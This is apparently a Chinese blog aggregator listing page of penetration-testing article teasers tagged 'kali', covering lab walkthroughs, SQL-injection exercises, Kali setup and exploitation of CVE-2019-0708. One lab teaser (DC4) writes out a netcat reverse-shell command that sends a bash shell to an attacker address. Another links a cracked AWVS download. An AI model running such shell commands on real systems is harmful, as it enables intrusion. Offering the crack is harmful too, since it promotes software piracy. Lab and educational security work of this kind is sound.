渗透测试kali

渗透测试(13)- 费解的三次握手和四次挥手

上一篇文章通过wireshark抓包工具简单了解了TCP/IP协议的五层工作模型,其中传输层我们已经知道主要是用来增加端口信息的。传输层主要有两种协议,一种是面向连接的TCP协议,一种是无连接的UDP协议,无连接的UDP协议比较好理解,比如我们刷抖音,看视频,基本都是UDP协议,udp协议传输速度快,但不能保证数据的完整性,我们刷抖音的时候,如果网络有波动,即使丢失了一些画面,影响也很小,可以说基
fanmeng2008·2024-01-18 19:13

OSCP 靶场 - Vault

端口扫描nmapnmap-O192.168.162.172smb枚举smbmap(kali自带)//枚举GUEST用户可以使用的目录smbmap-uGUEST-H192.168.162.172NTLMrelay—smbrelay1
安鸾彭于晏·2024-01-18 17:15

kali内 安装漏洞扫描神器awvs

一、安装破解awvs1.通过网盘连接下载awvs及破解文件下载链接:https://pan.baidu.com/s/1csUWPiVkwBNhcUES3XzNqQ?pwd=9xdh2.安装awvsmkdirawvscdawvschmod+xacunetix_trial.shchmod+xpatch_awvs./acunetix_trial.sh#执行安装,q退出信息提示3.访问awvs界面可以看到
程序学到昏·2024-01-18 15:12

渗透测试之sql注入

注入攻击的原理:注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明。这使得攻击者有机会将程序命令当作用户输入的数据提交给Web程序,以发号施令,为所欲为(注:注入最终是数据库,与脚本、平台无关)。总之一句话:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。注入前的准备及注入漏洞检测:1、显示友好HTTP错误信息(现在浏览器不用管)2、手工检测SQL注入点最常用的
小银同学阿·2024-01-18 15:08

渗透测试之逆向使用IDA pro软件修改.exe小程序打开对话框显示的文字

环境:Win10专业版IDAproVersion7.5.201028.exe小程序问题描述:IDApro软件如何修改.exe小程序打开对话框显示的文字?解决方案:一、在IDAPython脚本中编写代码来修改.rdata段中的静态字符串可以使用以下示例代码作为起点(未成功)importidc#定义要修改的字符串地址string_address=0x12345678#请替换为实际的字符串地址new_s
玩电脑的辣条哥·2024-01-18 15:42

渗透测试之用Kali2022渗透Windows 10系统

环境:1.渗透者IP:192.168.1.35系统:KALI2022(vmware16.0)2.靶机IP:192.168.1.16系统:Windows103.USB无线网卡问题描述:渗透测试之用Kali2022
玩电脑的辣条哥·2024-01-18 15:42

渗透测试之如何部署和使用Supershell

环境:Supershellv2.0.0Centos7.6dockerv.21问题描述:如何部署和使用Supershell解决方案:1、下载最新release源码,解压后进入项目目录wgethttps://github.com/tdragon6/Supershell/releases/latest/download/Supershell.tar.gz如果在线下很慢,用浏览器下载如何上传到服务器里解压
玩电脑的辣条哥·2024-01-18 15:41

Kali中如何新建root用户

当我们安装好kali后发现默认不是root用户权限,而我们日常操作经常需要用到root权限,那么我们就需要新建root用户。1.先以安装kali系统时设置的普通用户账户登入,进入命令行。
tianles·2024-01-18 11:10

Kali在Vmware无法连接到网络,配置网络及解决办法

一.问题描述:打开Kali,无法连接到网络,虚拟机配置正常的。
tianles·2024-01-18 11:08

渗透测试Kali如何利用CVE-2019-0708漏洞渗透Win7

环境:1.攻击者IP:192.168.1.10系统:KALI2022(vmware16.0)2.靶机IP:192.168.1.8系统:Windows76.1.7601ServicePack1Build7601
玩电脑的辣条哥·2024-01-18 10:17

CryptoChat:一款功能强大的纯Python消息加密安全传输工具

关于CryptoChatCryptoChat是一款功能强大的纯Python消息加密安全传输工具,该工具专为安全研究专家、渗透测试人员和红蓝队专家设计,该工具可以完全保证数据传输中的隐私安全。
FreeBuf_·2024-01-18 09:26

渗透测试 | 信息收集常用方法总结

目录一、关于域名1.子域名收集a.搜索引擎查找b.在线查询c.工具d.SSL/TLS证书查询2.端口型站点收集3.目录文件扫描a.目录扫描工具b.github搜索c.google搜索d.在线网站e.文件接口工具4.旁站和C段a.旁站查询b.C段查询5.网站技术架构信息a.基础知识b.网站头信息6.CMS识别二、关于IP1.CDNa.CDN检测b.CDN绕过2.主机发现a.二层发现b.三层发现c.四
运维Z叔·2024-01-18 09:25

DC - 2靶机通关

24扫网段内存活的主机(-sP指的是ping扫描,以发现对ping有响应的主机),当然你也可以用arp-scan-l扫描,需要注意的是,它利用的是ARP协议,所以只能扫本地网络中的主机,如果是实战中的渗透测试
生活的云玩家·2024-01-18 06:44

网络安全B模块(笔记详解)- JavaScript安全绕过

1.使用渗透机场景kali中工具扫描服务器,将服务器上apache版本号作为flag提交;2.使用渗透机场景windows7访问服务其场景中的网站(网站路径为IP/javascript),找到网站首页中
何辰风·2024-01-18 06:12

安卓APP和小程序渗透测试技巧总结

记得开启模拟器的ROOT权限:本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担。由于安卓7开始对系统安全性做了些改动,导致应用程序不再信任客户端证书,除非应用程序明确启用此功能。所以我们抓取https流量包时会出现证书失效、加密、无法访问等问题。下面记录一下解决方法。证书信任简单来说,就是把用户的证书导入到系统证书目录,使证书成
代码小念·2024-01-18 03:22

虚拟机安装kali

一、1.新建虚拟机,自定义(高级)2.虚拟机硬件兼容性:Workstation6.5-7.x3.稍后安装操作系统4.Debian6x645.目录的文件夹要分开,防止互相影响6.4G内存7.桥接模式(内网不影响,外网可连接)8.推荐,推荐,创建新虚拟磁盘(一个处理器2核)9.磁盘空间40G(从物理硬盘划分去给虚拟机,用多少上多少),拆分成多个文件勾选10.默认11.打印机用不到去掉12.加载CD/D
心晴_32f8·2024-01-18 02:31

从零开始配置pwn环境:优化pwndocker配置

1.研究背景从零开始配置kali2023环境:配置pwn调试环境-CSDN博客前期安装好pwndocker后发现不好用,所以通过研究修改一些配置后可以满足解题需要2.遇到的问题并解决1.docker环境
网络安全我来了·2024-01-18 02:12

靶机-DC4

尝试进入后台选择第一个抓包发现这里是直接可以解析的将命令改成自己想要输入的反弹shellnc192.168.253.1299999-e/bin/bash只做到这里,后面shell反弹死都获取不到可以看到kali
随风随梦自在逍遥·2024-01-18 01:13

Failed to start bean ‘org.springframework.kafka.config.internalKafkaListenerEndpointRegistry‘;

错误原因:kafka的配置文件consumer.properties里面的group.id和idea中项目配置文件中的group-id设置的不一样。解决办法:设置为相同值就可以了。
假期的学习·2024-01-18 00:15

DEATHNOTE: 1

首先通过kali使用nmap进行主机发现发现IP地址为192.168.75.129的主机发现其22端口和80端口开放对其进行详细扫描发现其操作系统是Linux4.15-5.6访问192.168.75.129
什么都好奇·2024-01-17 16:38

解决kali beef启动失败解问题

rubyapt-getinstallrubyapt-getinstallruby-devlibpcap-devgeminstalleventmachine重新安装beefapt-getinstallbeef-xss弄完以上步骤如果还是不行就重启kali
什么都好奇·2024-01-17 16:35

waf识别工具----WAFW00F

waf识别在渗透测试中必不可少的一环识别网站使用的什么WAF,可以去找相应的绕过手段。
黑战士安全·2024-01-17 15:39

CTF CRYPTO 密码学-1

题目名称:enc题目描述:压缩包中含两个文件:一个秘钥d.dec,一个密文flag.enc解题过程:Step1:这题是一个解密他题目,尝试openssl去ras解密工具简介在KaliLinux系统中,openssl
Brucye·2024-01-17 13:42

网络安全(黑客)技术——自学2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。
谈泊·2024-01-17 12:41

网络/信息安全(黑客)技术——自学2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。
谈泊·2024-01-17 12:09

渗透测试(11)- DVWA靶场搭建及目录扫描工具的应用

上两篇文章分别介绍了被动信息收集和主动信息收集,本篇将重点介绍目录扫描,另外还介绍一下phpstudy,后期的学习过程中,需要通过靶机来学习,因为随意攻击任何一个网站都是非法的。通过phpstudy我们可以很轻松的搭建一个供我们学习的网站。1、安装PHPStudy官网下载地址:http://www.phpstudy.net/PHPStudy的安装很简单,一直下一步就可以,就不做更多的介绍了,主要说
fanmeng2008·2024-01-17 12:34

渗透测试(10)- 目标资产被动信息收集

信息收集可以分为两类:主动信息搜集和被动信息收集:主动信息收集在上一篇文章也做了介绍,被动信息搜集:指不与目标主机进行直接交互,通过搜索引擎或者社会工程等方式间接的获取目标主机的信息。总结一下需要收集的信息:(1)网站服务器方面:服务器系统及版本,端口信息,IP地址(2)站点信息:中间件、编程语言、数据库、后台目录、敏感目录、敏感文件、旁站、C段(3)子域名信息收集:注册信息、备案信息、子域名信息
fanmeng2008·2024-01-17 12:33

渗透测试(7)-linux基础命令学习(2)

三、文本文件编辑命令1.cat命令cat:用于查看文本文件(内容较少的文件),格式为“cat[选项][文件]”。Linux系统中有多个用于查看文本内容的命令,每个命令都有自己的特点,比如这个cat命令就是用于查看内容较少的纯文本文件的。cat这个命令也很好记,因为cat在英语中是“猫”的意思,小猫咪有一种娇小、可爱的感觉,所有如果查看较小的文件,就小猫一下。如果在查看文本内容时还想顺便显示行号的话
fanmeng2008·2024-01-17 12:03

渗透测试(8)- Kali Linux 系统概述

KaliLinux是一个基于Debian的Linux发行版,包括很多安全和取证方面的相关工具。
fanmeng2008·2024-01-17 12:03

渗透测试(9)- 目标资产主动信息收集

目录1、主动信息收集的特点2、发现目标主机的过程3、0SI七层模型和TCP/IP五层模型4、二层(数据链路层)发现arping\netdiscover5、三层发现ping命令探索6、四层发现nmap扫描方式1、主动信息收集的特点直接与目标系统进行交互通信无法避免留下访问痕迹使用受挫的第三方电脑进行探测,使用代理或已经被控制的机器(肉鸡)扫描发送不同的探测,根据返回结果判断目标状态2、发现目标主机的
fanmeng2008·2024-01-17 12:03

渗透测试(5)-Windows 命令行

目录1.Windows命令行简介2.Windows常用基本命令3.Bat脚本1.Windows命令行简介现在大部分同学都是通过Windows操作系统来使用计算机。通常是使用鼠标、键盘来启动程序、关闭程序、录入文本等。实际上,当我们在点击鼠标、敲击键盘时,操作系统会执行相应的命令。我们操作电脑的过程就是一个不断通过操作系统向计算机发送指令的过程从这幅图中我们也查看电脑的基本信息:当前日期、时间、当前
fanmeng2008·2024-01-17 12:33

渗透测试(7)-linux基础命令学习(1)

一、常用的系统操作命令1、echo、clear命令echo命令用于在终端输出字符串或变量提取后的值,格式为“echo[字符串|$变量]”。注:上图是定义了一个变量name,然后输入出变量的值,输出变量时,变量名称前加$符号clear:清除上面所有的系统操作运行的命令及内容,输入后效果如下图:2、historyhistory:历史命令查看,查看之前输入的所有命令在使用history命令时,*如果使用
fanmeng2008·2024-01-17 12:33

渗透测试(1)-VMware详细安装步骤和图示

目录1.Vmware虚拟机简介1.1什么是虚拟机1.2VMware简介1.3VMware主要特点2.Vmware安装步骤1:双击安装包,加载有时候比较慢,需稍等片刻步骤2:进入安装界面,点击下一步步骤3:接受许可协议后,点击下一步步骤4:点击‘更改’设置安装路径步骤5:修改后点击确定按钮步骤6:取消勾选用户体验设置,然后点击下一步步骤7:根据自身需求,勾选桌面或开始菜单程序文件后,点击下一步步骤8
fanmeng2008·2024-01-17 12:32

渗透测试(12)- WireShark 网络数据包分析

目录1、WireShack简介2、WireShark基本使用方法3、WireShack抓包分析3.1HypertextTransferProtocol(应用层)3.2TransmissionControlProtocol(传输层)3.3InternetProtocolVersion4(网络层)3.4EthernetIl(链路层):数据链路层以太网头部信息3.5Frame(物理层)1、WireSha
fanmeng2008·2024-01-17 12:29

Kali Linux实现UEFI和传统BIOS(Legacy)引导启动

默认Kalilinux安装会根据当前启动的引导模式进行安装例:以UEFI引导启动安装程序,安装后仅能在UEFI引导模式下进入系统安装Kali系统这边基于VirtualBox虚拟机镜像实战操作首先创建一个
陀螺蚁·2024-01-17 12:45

网络安全B模块(笔记详解)- 文件包含

文件包含的渗透与加固1.使用渗透机场景kali中工具扫描服务器,将服务器上FileInclusion首页概述页中的Flag提交;Flag:iloveu2.使用渗透机场景windows7访问服务器场景网站中的
何辰风·2024-01-17 09:34

渗透测试之Linux下提权

一:环境搭建直接在kali里面启用apache服务1:在终端输入“vim/etc/apache2/ports.conf”->键盘输入i进入插入编辑模式->修改apache2默认监听端口号为8080->编辑好后
Admin3K·2024-01-17 06:13

【HTB】ServMon(目录遍历,chisel隧道,普通用户提权至管理员组)

服务探测┌──(rootkali)-[~/htb/ServMon]└─#nmap-sV-Pn10.10.10.184-p-Hostdiscoverydisabled(-Pn).Alladdresseswi
天线锅仔·2024-01-17 06:27

【VulnHub靶场】medium_socnet

boredhackerblog-social-network,454/知识涉及范围:主机发现端口扫描服务发现路径爬取代码注入Shell脚本内网信息收集内网穿透漏洞利用密码破解本地提权攻击代码修改涉及工具kali
xi-chen·2024-01-17 05:04

Linux环境编译安装Ghidra教程

2021.12.30更新,换用了kalilinux2021.4版本环境,该环境不再集成JDK和Gradle2022.3.16更新,gihub镜像地址hub.fastgit.org已经变更,新地址为hub.fastgit.xyz
浮生忘梦·2024-01-17 01:35

MacOS环境下Kali Linux安装及使用指导

KaliLinux是一个开源的、基于Debian的Linux发行版,面向各种信息安全任务,如渗透测试、安全研究、计算机取证和逆向工程,是最先进的渗透测试发行版,它的前身是BackTrack。
筑梦之月·2024-01-17 01:35

(菜鸟自学)搭建虚拟渗透实验室——安装Kali Linux

安装KaliLinuxKaliLinux是一种基于Debian的专为渗透测试和网络安全应用而设计的开源操作系统。
nbdlsplyb·2024-01-17 00:22

网络安全(黑客)—2024自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。
德西德西·2024-01-16 21:07

网络安全(黑客)—2024自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。
德西德西·2024-01-16 21:07

网络安全(黑客)—2024自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。
德西德西·2024-01-16 21:36

网络安全(黑客)—2024自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。
德西德西·2024-01-16 21:06

sqli-labs关卡22(基于cookie被base64编码的报错盲注)

注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!一、回顾上一关知识点上一关是基于cookie被base64编码的报错注入,突破点就是如何找到是cookie注入,并且能够识别bas
无名小卒且不会安全的zzyyhh·2024-01-16 21:26

sqli-labs关卡23(基于get提交的过滤注释符的报错注入)

注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!一、回顾前几关知识点前几关是基于http头部注入,由于开发人员为了方便记录用户cookie、xff、user-agent、refe
无名小卒且不会安全的zzyyhh·2024-01-16 21:26

sqli-labs关卡25(基于get提交的过滤and和or的联合注入)

注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!一、回顾上一关知识点上一关是过滤了注释符,导致单引号不能被过滤掉而闭合,得通过构造and'1'='1和
无名小卒且不会安全的zzyyhh·2024-01-16 21:26

AI安全02 AI安全测试工具

前言继上周内容,在如何提高AI的安全性方面,GPT老师曾说:以后的世界,也许就是AI监督AI、AI攻击AI的世界~(●'◡'●)本篇博文内容专注在黑客攻击AI模型,介绍一些渗透测试工具与学习路线~AI安全可分为
梅头脑_·2024-01-16 21:53
上一页 11 12 13 14 15 16 17 18 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他